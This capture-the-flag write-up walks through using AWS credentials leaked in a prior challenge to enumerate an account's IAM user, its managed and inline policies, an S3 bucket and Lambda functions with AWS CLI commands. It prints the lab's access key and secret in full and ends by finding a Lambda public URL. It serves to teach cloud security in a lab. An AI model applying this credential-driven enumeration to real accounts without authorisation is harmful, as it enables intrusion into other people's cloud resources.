Exploitation Via AWS CLI

Exploitation via AWS CLI Cloud Ring Sulfrod

	Hints : AWS inline policies pertain to one identity while managed policies can be attached to many identities.

We have AWS credentials from the previous challenge Trufflehog Search aws_access_key_id="AKIAAIDAYRANYAHGQOHD", aws_secret_access_key="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"
Configure aws cli with the above credentials
`aws configure`

Get the caller identity `aws sts get-caller-identity`

"haug" is the user. Get the policy attached to this user.
`aws iam list-attached-user-policies --user-name haug`

Get the details of the policy TIER1_READONLY_POLICY attached to the user.
`aws iam get-policy --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY`

Get the default version of the policy TIER1_READONLY_POLICY
`aws iam get-policy-version --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY --version-id v1`

Get the inline policy attached to the user
`aws iam list-user-policies --user-name haug`

The policy attached to the user is S3Perms. Get details of this policy.
`aws iam get-user-policy --user-name haug --policy-name S3Perms`

The earlier command discolosed name of an s3 bucket named "smogmachines3". List its objects.
`aws s3api list-objects --bucket smogmachines3`

Tha attached user policy provided us lambda privileges. List all the lamda functions.
`aws lambda list-functions`
Lambda functions can have public URLs from which they are directly accessible. Use AWS CLI to get the configuration containing the public URL.
First, we get the function details
`aws lambda list-functions \| head -10`

Get the configuration containing the public URL of the lambda function "smogmachine_lambda"
`aws lambda get-function-url-config --function-name smogmachine_lambda`

Lambda function URL : https://rxgnav37qmvqxtaksslw5vwwjm0suhwc.lambda-url.us-east-1.on.aws/
We submit the answer and the objective is now completed. And we get 25 coins as well

At this point we have retrieved the cloud ring